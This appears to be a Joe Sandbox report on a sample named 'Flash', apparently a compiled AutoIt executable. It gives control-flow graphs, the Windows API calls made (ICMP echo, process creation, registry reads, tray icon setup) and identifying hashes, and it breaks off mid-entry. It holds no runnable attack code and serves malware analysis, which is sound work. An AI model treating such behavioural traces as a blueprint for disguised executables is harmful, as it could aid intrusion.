                                                        control_flow_graph 713 a45e1d-a45e54 call 9d4dc0 716 a45e74-a45e86 WSAStartup 713->716 717 a45e56-a45e63 call 9d502b 713->717 719 a45e9d-a45edb call 9e40cd call 9d4d37 call 9e402a inet_addr gethostbyname 716->719 720 a45e88-a45e98 call a27135 716->720 717->716 725 a45e65-a45e70 call 9d502b 717->725 734 a45eec-a45efc call a27135 719->734 735 a45edd-a45eea IcmpCreateFile 719->735 729 a45ff6-a45ffe 720->729 725->716 740 a45fed-a45ff1 call 9e1cb6 734->740 735->734 736 a45f01-a45f32 call 9f0fe6 call 9e433f 735->736 745 a45f34-a45f53 IcmpSendEcho 736->745 746 a45f55-a45f69 IcmpSendEcho 736->746 740->729 747 a45f6d-a45f6f 745->747 746->747 748 a45f71-a45f76 747->748 749 a45fa2-a45fa4 747->749 750 a45f78-a45f7d 748->750 751 a45fba-a45fcc call 9d4dc0 748->751 752 a45fa6-a45fb2 call a27135 749->752 753 a45fb4-a45fb8 750->753 754 a45f7f-a45f84 750->754 760 a45fd2 751->760 761 a45fce-a45fd0 751->761 764 a45fd4-a45fe8 IcmpCloseHandle WSACleanup call 9e45ae 752->764 753->752 754->749 758 a45f86-a45f8b 754->758 762 a45f8d-a45f92 758->762 763 a45f9a-a45fa0 758->763 760->764 761->764 762->753 766 a45f94-a45f98 762->766 763->752 764->740 766->752
                                                        APIs
                                                        • WSAStartup.WS2_32(00000101,?), ref: 00A45E7E
                                                        • inet_addr.WSOCK32(?,?,?), ref: 00A45EC3
                                                        • gethostbyname.WS2_32(?), ref: 00A45ECF
                                                        • IcmpCreateFile.IPHLPAPI ref: 00A45EDD
                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00A45F4D
                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00A45F63
                                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00A45FD8
                                                        • WSACleanup.WSOCK32 ref: 00A45FDE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                        • String ID: Ping
                                                        • API String ID: 1028309954-2246546115
                                                        • Opcode ID: 85ddcb1e393cefeb125380c9391ede56ae1407e20050f5ed0307f8670f82637a
                                                        • Instruction ID: 34072c17994bfc34cef0eea32cd6c62ea48d0482921fd69aaee3c3e171e8d29d
                                                        • Opcode Fuzzy Hash: 85ddcb1e393cefeb125380c9391ede56ae1407e20050f5ed0307f8670f82637a
                                                        • Instruction Fuzzy Hash: 0B51AC35A046019FD721EF64CC49F2AB7F4AF88710F148929F996DB2A2DB70ED44CB42

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 767 9e4d83-9e4dd1 769 9e4dd3-9e4dd6 767->769 770 9e4e31-9e4e33 767->770 771 9e4dd8-9e4ddf 769->771 772 9e4e37 769->772 770->769 773 9e4e35 770->773 774 9e4ead-9e4eb5 PostQuitMessage 771->774 775 9e4de5-9e4dea 771->775 777 a209c2-a209f0 call 9dc460 call 9dc483 772->777 778 9e4e3d-9e4e40 772->778 776 9e4e1a-9e4e22 DefWindowProcW 773->776 785 9e4e61-9e4e63 774->785 781 a20a35-a20a49 call a32cce 775->781 782 9e4df0-9e4df2 775->782 784 9e4e28-9e4e2e 776->784 814 a209f5-a209fc 777->814 779 9e4e65-9e4e8c SetTimer RegisterWindowMessageW 778->779 780 9e4e42-9e4e43 778->780 779->785 788 9e4e8e-9e4e99 CreatePopupMenu 779->788 786 a20965-a20968 780->786 787 9e4e49-9e4e5c KillTimer call 9e5ac3 call 9d34e4 780->787 781->785 807 a20a4f 781->807 789 9e4df8-9e4dfd 782->789 790 9e4eb7-9e4ec1 call 9e5b29 782->790 785->784 793 a2096a-a2096c 786->793 794 a2099e-a209bd MoveWindow 786->794 787->785 788->785 796 a20a1a-a20a21 789->796 797 9e4e03-9e4e08 789->797 809 9e4ec6 790->809 801 a2096e-a20971 793->801 802 a2098d-a20999 SetFocus 793->802 794->785 796->776 804 a20a27-a20a30 call a28854 796->804 805 9e4e0e-9e4e14 797->805 806 9e4e9b-9e4eab call 9e5bd7 797->806 801->805 810 a20977-a20988 call 9dc460 801->810 802->785 804->776 805->776 805->814 806->785 807->776 809->785 810->785 814->776 818 a20a02-a20a15 call 9e5ac3 call 9e59d3 814->818 818->776
                                                        APIs
                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 009E4E22
                                                        • KillTimer.USER32(?,00000001), ref: 009E4E4C
                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 009E4E6F
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009E4E7A
                                                        • CreatePopupMenu.USER32 ref: 009E4E8E
                                                        • PostQuitMessage.USER32(00000000), ref: 009E4EAF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                        • String ID: TaskbarCreated
                                                        • API String ID: 129472671-2362178303
                                                        • Opcode ID: d76462b41637ec729f58d6b20936022b7fac46a02bc1662357c96a42b8e7958f
                                                        • Instruction ID: 6c9ef51ee6abbdaabca6e8383b290e040b2444b16e869f591fad29b423e37382
                                                        • Opcode Fuzzy Hash: d76462b41637ec729f58d6b20936022b7fac46a02bc1662357c96a42b8e7958f
                                                        • Instruction Fuzzy Hash: 1E412C71368186ABDF179FA99C49FBF3699F740300F04092EF502952E2CAB4AC91D771

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 908 a4fd7d-a4fdde call 9f3010 911 a4fde0-a4fdf3 call 9d502b 908->911 912 a4fe0a-a4fe0e 908->912 923 a4fdf5-a4fe08 call 9d502b 911->923 924 a4fe40 911->924 914 a4fe55-a4fe5b 912->914 915 a4fe10-a4fe20 call 9d502b 912->915 918 a4fe70-a4fe76 914->918 919 a4fe5d-a4fe60 914->919 927 a4fe23-a4fe3c call 9d502b 915->927 920 a4fe80-a4fe9a call 9d4d37 call 9e436a 918->920 921 a4fe78 918->921 925 a4fe63-a4fe68 call 9d502b 919->925 941 a4fea0-a4fef9 call 9d4d37 call 9e436a call 9d4d37 call 9e436a call 9d4d37 call 9e436a 920->941 942 a4ff59-a4ff61 920->942 921->920 923->927 928 a4fe43-a4fe47 924->928 925->918 927->914 940 a4fe3e 927->940 933 a4fe51-a4fe53 928->933 934 a4fe49-a4fe4f 928->934 933->914 933->918 934->925 940->928 988 a4ff27-a4ff57 GetSystemDirectoryW call 9f0fe6 GetSystemDirectoryW 941->988 989 a4fefb-a4ff16 call 9d4d37 call 9e436a 941->989 944 a4ff63-a4ff7e call 9d4d37 call 9e436a 942->944 945 a4ff8b-a4ffb9 GetCurrentDirectoryW call 9f0fe6 GetCurrentDirectoryW 942->945 944->945 958 a4ff80-a4ff89 call 9f2e2c 944->958 954 a4ffbd 945->954 957 a4ffc1-a4ffc5 954->957 960 a4fff6-a50006 call a36f95 957->960 961 a4ffc7-a4fff1 call 9d4f98 * 3 957->961 958->945 958->960 970 a50062 960->970 971 a50008-a50053 call a37652 call a37561 call a375da 960->971 961->960 977 a50064-a50068 970->977 971->977 1007 a50055-a50060 971->1007 981 a50114-a5013b CreateProcessW 977->981 982 a5006e-a50099 call a28ef3 977->982 986 a5013e-a50151 call 9f105c * 2 981->986 992 a500a2 call a291cf 982->992 993 a5009b-a500a0 call a28f2e 982->993 1009 a50190-a5019c CloseHandle 986->1009 1010 a50153-a5018b call a27135 GetLastError call 9efdae call 9d4dc0 986->1010 988->954 989->988 1016 a4ff18-a4ff21 call 9f2e2c 989->1016 1006 a500a7-a500b9 call 9f2e2c 992->1006 993->1006 1021 a500c2-a500d2 call 9f2e2c 1006->1021 1022 a500bb-a500c0 1006->1022 1007->977 1014 a5019e-a501c3 call a37205 call a3784d call a5025f 1009->1014 1015 a501c8-a501cc 1009->1015 1025 a50211-a50222 call a3702f 1010->1025 1014->1015 1023 a501ce-a501d8 1015->1023 1024 a501da-a501e4 1015->1024 1016->957 1016->988 1041 a500d4-a500d9 1021->1041 1042 a500db-a500eb call 9f2e2c 1021->1042 1022->1021 1022->1022 1023->1025 1026 a501e6 1024->1026 1027 a501ec-a5020b call 9d4dc0 CloseHandle 1024->1027 1026->1027 1027->1025 1041->1041 1041->1042 1047 a500f4-a50112 call 9f105c * 3 1042->1047 1048 a500ed-a500f2 1042->1048 1047->986 1048->1047 1048->1048
                                                        APIs
                                                        • _memset.LIBCMT ref: 00A4FD9E
                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A4FF31
                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A4FF55
                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A4FF95
                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A4FFB7
                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00A50133
                                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00A50165
                                                        • CloseHandle.KERNEL32(?), ref: 00A50194
                                                        • CloseHandle.KERNEL32(?), ref: 00A5020B
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                        • String ID:
                                                        • API String ID: 4090791747-0
                                                        • Opcode ID: 70eae177ec1d01893f1ae2b25d794004cde9570fa12af5dd722f16e1c1e7c93f
                                                        • Instruction ID: 08e2ee68decef554ce5be9ccfaa13c89935f8e1ebb4ca46a4351bbda1373af7e
                                                        • Opcode Fuzzy Hash: 70eae177ec1d01893f1ae2b25d794004cde9570fa12af5dd722f16e1c1e7c93f
                                                        • Instruction Fuzzy Hash: C5E18D312043419FCB25EF24C891B6EBBE1BF85314F14896DF9899B2A2DB31EC45CB52

                                                        Control-flow Graph

                                                        APIs
                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00A20C5B
                                                          • Part of subcall function 009E1821: _memmove.LIBCMT ref: 009E185B
                                                        • _memset.LIBCMT ref: 009E5787
                                                        • _wcscpy.LIBCMT ref: 009E57DB
                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 009E57EB
                                                        • __swprintf.LIBCMT ref: 00A20CD1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                                        • String ID: Line %d: $AutoIt -
                                                        • API String ID: 230667853-4094128768
                                                        • Opcode ID: 6c17a7b1a1ce6b8b2e2bbd8bd03d4681a8ac4ea5c29da4536d1209f0eb2be934
                                                        • Instruction ID: 4232ac8f19a9b0e672b1d4067093468e5e5e02ef7785265a2c6765abd0e5dfda
                                                        • Opcode Fuzzy Hash: 6c17a7b1a1ce6b8b2e2bbd8bd03d4681a8ac4ea5c29da4536d1209f0eb2be934
                                                        • Instruction Fuzzy Hash: 4C41D971118344AAC322EB65DC45FDF77ECAFC4354F104A1EF185920A2DF749A49C7A6

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1208 9e50db-9e514b CreateWindowExW * 2 ShowWindow * 2
                                                        APIs
                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 009E5109
                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 009E512A
                                                        • ShowWindow.USER32(00000000), ref: 009E513E
                                                        • ShowWindow.USER32(00000000), ref: 009E5147
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Window$CreateShow
                                                        • String ID: AutoIt v3$edit
                                                        • API String ID: 1584632944-3779509399
                                                        • Opcode ID: a4cde06017b5dbd6679dff21e5ceb86b97e8c9c6acb4cf598530806f3e5b268b
                                                        • Instruction ID: 010997b6544bc5d6dc36141dde637c18e847ace87aa2a61081e8cde5389a6abb
                                                        • Opcode Fuzzy Hash: a4cde06017b5dbd6679dff21e5ceb86b97e8c9c6acb4cf598530806f3e5b268b
                                                        • Instruction Fuzzy Hash: C3F0FE716652947EEA3197A76C4CEBB3E7DE7C6F50F00011FB900A21B0CAB11892DAB4

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1209 a39b16-a39b9b call 9e4a8c call a39cf1 1214 a39ba5-a39c31 call 9e4ab2 * 4 call 9e4a8c call 9f593c * 2 call 9e4ab2 1209->1214 1215 a39b9d 1209->1215 1233 a39c36-a39c5c call a396c4 call a38f0e 1214->1233 1216 a39b9f-a39ba0 1215->1216 1218 a39ce8-a39cee 1216->1218 1238 a39c73-a39c77 1233->1238 1239 a39c5e-a39c6e call 9f2f85 * 2 1233->1239 1240 a39c79-a39cd6 call a390c1 call 9f2f85 1238->1240 1241 a39cd8-a39cde call 9f2f85 1238->1241 1239->1216 1250 a39ce0-a39ce6 1240->1250 1241->1250 1250->1218
                                                        APIs
                                                          • Part of subcall function 009E4A8C: _fseek.LIBCMT ref: 009E4AA4
                                                          • Part of subcall function 00A39CF1: _wcscmp.LIBCMT ref: 00A39DE1
                                                          • Part of subcall function 00A39CF1: _wcscmp.LIBCMT ref: 00A39DF4
                                                        • _free.LIBCMT ref: 00A39C5F
                                                        • _free.LIBCMT ref: 00A39C66
                                                        • _free.LIBCMT ref: 00A39CD1
                                                          • Part of subcall function 009F2F85: RtlFreeHeap.NTDLL(00000000,00000000,?,009F9C54,00000000,009F8D5D,009F59C3), ref: 009F2F99
                                                          • Part of subcall function 009F2F85: GetLastError.KERNEL32(00000000,?,009F9C54,00000000,009F8D5D,009F59C3), ref: 009F2FAB
                                                        • _free.LIBCMT ref: 00A39CD9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                        • String ID: >>>AUTOIT SCRIPT<<<
                                                        • API String ID: 1552873950-2806939583
                                                        • Opcode ID: b4c58c5f7a84e8612e33dc1766fac52dd2138576106f6c81fc8cab367bbcac10
                                                        • Instruction ID: 1e58f5abc7a8ff672885465f49e7f869c9636c6af9e3ca92dbf73bc181ac89ce
                                                        • Opcode Fuzzy Hash: b4c58c5f7a84e8612e33dc1766fac52dd2138576106f6c81fc8cab367bbcac10
                                                        • Instruction Fuzzy Hash: CE513BB1D04259AFDF249F65DC45BAEBBB9FF88314F0004AEB249A3241DB715E908F58

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1253 9f563d-9f5656 1254 9f5658-9f565d 1253->1254 1255 9f5673 1253->1255 1254->1255 1257 9f565f-9f5661 1254->1257 1256 9f5675-9f567b 1255->1256 1258 9f567c-9f5681 1257->1258 1259 9f5663-9f5668 call 9f8d58 1257->1259 1260 9f568f-9f5693 1258->1260 1261 9f5683-9f568d 1258->1261 1267 9f566e call 9f8fe6 1259->1267 1264 9f5695-9f56a0 call 9f3010 1260->1264 1265 9f56a3-9f56a5 1260->1265 1261->1260 1263 9f56b3-9f56c2 1261->1263 1270 9f56c9 1263->1270 1271 9f56c4-9f56c7 1263->1271 1264->1265 1265->1259 1269 9f56a7-9f56b1 1265->1269 1267->1255 1269->1259 1269->1263 1274 9f56ce-9f56d3 1270->1274 1271->1274 1275 9f57bc-9f57bf 1274->1275 1276 9f56d9-9f56e0 1274->1276 1275->1256 1277 9f56e2-9f56ea 1276->1277 1278 9f5721-9f5723 1276->1278 1277->1278 1279 9f56ec 1277->1279 1280 9f578d-9f578e call a00dd7 1278->1280 1281 9f5725-9f5727 1278->1281 1282 9f57ea 1279->1282 1283 9f56f2-9f56f4 1279->1283 1292 9f5793-9f5797 1280->1292 1285 9f574b-9f5756 1281->1285 1286 9f5729-9f5731 1281->1286 1291 9f57ee-9f57f7 1282->1291 1289 9f56fb-9f5700 1283->1289 1290 9f56f6-9f56f8 1283->1290 1287 9f575a-9f575d 1285->1287 1288 9f5758 1285->1288 1293 9f5733-9f573f 1286->1293 1294 9f5741-9f5745 1286->1294 1295 9f575f-9f576b call 9f4906 call a0108b 1287->1295 1296 9f57c4-9f57c8 1287->1296 1288->1287 1289->1296 1297 9f5706-9f571f call a00ef8 1289->1297 1290->1289 1291->1256 1292->1291 1298 9f5799-9f579e 1292->1298 1299 9f5747-9f5749 1293->1299 1294->1299 1314 9f5770-9f5775 1295->1314 1300 9f57da-9f57e5 call 9f8d58 1296->1300 1301 9f57ca-9f57d7 call 9f3010 1296->1301 1313 9f5782-9f578b 1297->1313 1298->1296 1304 9f57a0-9f57b1 1298->1304 1299->1287 1300->1267 1301->1300 1309 9f57b4-9f57b6 1304->1309 1309->1275 1309->1276 1313->1309 1315 9f57fc-9f5800 1314->1315 1316 9f577b-9f577e 1314->1316 1315->1291 1316->1282 1317 9f5780 1316->1317 1317->1313
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                        • String ID:
                                                        • API String ID: 1559183368-0
                                                        • Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                        • Instruction ID: 9f96d162269295f56844806bd10f9f371cde3b340d51380c5c4e14038114bfc9
                                                        • Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                        • Instruction Fuzzy Hash: 0351A230A00B0DDBDB24AFB9D88467E77A9AF40324F258B29FB35D62D0DB749D519B40
                                                        APIs
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009D52E6
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009D534A
                                                        • TranslateMessage.USER32(?), ref: 009D5356
                                                        • DispatchMessageW.USER32(?), ref: 009D5360
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Message$Peek$DispatchTranslate
                                                        • String ID:
                                                        • API String ID: 1795658109-0
                                                        • Opcode ID: 055bc1d795013ad480b5faa143dd9d8cecd0043423b8b37ec3dd909d069fb174
                                                        • Instruction ID: d7393c035bbaeb165bb652db0059516e31fc38ef5cf7ce153e405e2e9d95796a
                                                        • Opcode Fuzzy Hash: 055bc1d795013ad480b5faa143dd9d8cecd0043423b8b37ec3dd909d069fb174
                                                        • Instruction Fuzzy Hash: E431E531698B06DBEB30CBE8DC44FEAB7E89B01340F15C45BE522962E0D6A59886D721
                                                        APIs
                                                        • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,009D1275,SwapMouseButtons,00000004,?), ref: 009D12A8
                                                        • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,009D1275,SwapMouseButtons,00000004,?), ref: 009D12C9
                                                        • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,009D1275,SwapMouseButtons,00000004,?), ref: 009D12EB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: CloseOpenQueryValue
                                                        • String ID: Control Panel\Mouse
                                                        • API String ID: 3677997916-824357125
                                                        • Opcode ID: 4281695d4ac674247ba4970984900bfae4439cc736da997d7bbe0974f528cac8
                                                        • Instruction ID: d7d006010a5ab01b56d4a71a6567dcf45cf37a1d0844a161c6d173d915d18427
                                                        • Opcode Fuzzy Hash: 4281695d4ac674247ba4970984900bfae4439cc736da997d7bbe0974f528cac8
                                                        • Instruction Fuzzy Hash: 56115A72650208BFDB20CFA5DC84EAFBBBCEF04740F00856AF905D7210D2729E409BA0
                                                        APIs
                                                        • GetFileAttributesW.KERNEL32(?,00A62C4C), ref: 00A33F57
                                                        • GetLastError.KERNEL32 ref: 00A33F66
                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00A33F75
                                                        • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00A62C4C), ref: 00A33FD2
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: CreateDirectory$AttributesErrorFileLast
                                                        • String ID:
                                                        • API String ID: 2267087916-0
                                                        • Opcode ID: ea39ad70bbab5d0beee870de16c5a6fa23fb30940aeabf47bc7f8f70f6a7698d
                                                        • Instruction ID: 42433aa3926ccabe3ea433b25ec2260d68e81ea9f4ef875a823053d6dcd5b558
                                                        • Opcode Fuzzy Hash: ea39ad70bbab5d0beee870de16c5a6fa23fb30940aeabf47bc7f8f70f6a7698d
                                                        • Instruction Fuzzy Hash: 5721917190C2019F8B00DF29D8919AFB7F4BE59364F504A1EF495CB2A2D730DE46CB42
                                                        APIs
                                                        • _memset.LIBCMT ref: 009E5B58
                                                          • Part of subcall function 009E56F8: _memset.LIBCMT ref: 009E5787
                                                          • Part of subcall function 009E56F8: _wcscpy.LIBCMT ref: 009E57DB
                                                          • Part of subcall function 009E56F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 009E57EB
                                                        • KillTimer.USER32(?,00000001,?,?), ref: 009E5BAD
                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 009E5BBC
                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A20D7C
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
